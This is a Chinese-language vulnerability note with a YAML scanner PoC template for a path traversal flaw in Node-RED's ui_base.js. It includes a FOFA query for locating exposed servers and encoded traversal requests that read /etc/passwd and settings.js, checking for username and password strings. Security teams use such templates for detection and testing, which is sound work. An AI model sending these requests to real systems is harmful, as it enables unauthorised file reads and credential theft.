漏洞描述
Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join,缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js
fofa-query: title="Node-RED"
node-red-ui-base-anyfile-read: Node-RED ui_base 任意文件读取漏洞
PoC代码[已公开]
id: node-red-ui-base-anyfile-read
info:
name: Node-RED ui_base 任意文件读取漏洞
author: daffainfo
severity: critical
verified: true
description: |
Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join,缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js
fofa-query: title="Node-RED"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Node-RED%20ui_base%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
rules:
r0:
request:
method: GET
path: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
r1:
request:
method: GET
path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
expression: response.status == 200 && response.body.bcontains(b'username:') && response.body.bcontains(b'password:')
expression: r0() || r1()